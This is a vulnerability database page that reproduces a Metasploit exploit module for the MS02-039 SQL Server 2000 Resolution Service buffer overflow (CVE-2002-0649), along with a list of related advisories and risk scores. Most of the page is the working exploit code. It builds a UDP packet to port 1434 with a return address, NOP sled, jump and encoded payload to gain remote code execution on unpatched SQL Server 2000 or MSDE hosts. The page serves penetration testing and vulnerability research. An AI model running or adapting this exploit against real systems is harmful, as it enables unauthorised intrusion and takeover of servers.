Vulners
Lucene search
MS02-039 Microsoft SQL Server Resolution Overflow
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | CVE-2002-0649 | 30 Apr 201000:00 | – | circl |
 | MS-SQL Monitor Protocol (CVE-2002-0649; CVE-2002-0650) | 1 Feb 200500:00 | – | checkpoint_advisories |
| MSSQL 2000MSDE Resolution Buffer Overflow - Ver2 (CVE-2002-0649) | 31 Mar 201400:00 | – | checkpoint_advisories |
| Microsoft SQL 2000 Slammer Worm Denial of Service (CVE-2002-0649) | 9 Jun 201400:00 | – | checkpoint_advisories |
 | CVE-2002-0649 | 26 Jul 200204:00 | – | cve |
 | CVE-2002-0649 | 26 Jul 200204:00 | – | cvelist |
 | Microsoft SQL Server - Resolution Overflow (MS02-039) (Metasploit) | 30 Apr 201000:00 | – | exploitdb |
 | MS02-061: Microsoft SQL Server Multiple Vulnerabilities (uncredentialed check) | 25 Jan 200300:00 | – | nessus |
 | CVE-2002-0649 | 12 Aug 200204:00 | – | nvd |
 | Microsoft SQL Server Resolution Overflow | 30 Oct 200900:00 | – | packetstorm |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::MSSQL
def initialize(info = {})
super(update_info(info,
'Name' => 'MS02-039 Microsoft SQL Server Resolution Overflow',
'Description' => %q{
This is an exploit for the SQL Server 2000 resolution
service buffer overflow. This overflow is triggered by
sending a udp packet to port 1434 which starts with 0x04 and
is followed by long string terminating with a colon and a
number. This module should work against any vulnerable SQL
Server 2000 or MSDE install (pre-SP3).
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2002-0649'],
[ 'OSVDB', '4578'],
[ 'BID', '5310'],
[ 'MSB', 'MS02-039'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00\x3a\x0a\x0d\x2f\x5c",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[
'MSSQL 2000 / MSDE <= SP2',
{
'Platform' => 'win',
'Ret' => 0x42b48774,
},
],
],
'Platform' => 'win',
'DisclosureDate' => '2002-07-24',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(1434)
])
end
def check
info = mssql_ping
if (info['ServerName'])
print_status("SQL Server Information:")
info.each_pair { |k,v|
print_status(" #{k + (" " * (15-k.length))} = #{v}")
}
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
connect_udp
print_status(sprintf("Sending UDP packet with return address 0x%.8x", target.ret))
print_status("Execute 'net start sqlserveragent' once access is obtained");
# \x68:888 => push dword 0x3838383a
buf = "\x04" + rand_text_english(800, payload_badchars) + "\x68:888"
# Return to the stack pointer
buf[ 97, 4] = [target.ret].pack('V')
# Which lands right here
buf[101, 6] = make_nops(6)
# Jumps 8 bytes ahead
buf[107, 2] = "\xeb\x08"
# Write to thread storage space to avoid a crash
buf[109, 8] = [0x7ffde0cc, 0x7ffde0cc].pack('VV')
# And finally into the payload
buf[117,payload.encoded.length] = payload.encoded
udp_sock.put(buf)
disconnect_udp
handler
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Oct 2020 20:00Current
7.7High risk
Vulners AI Score7.7
CVSS 27.5
EPSS0.8475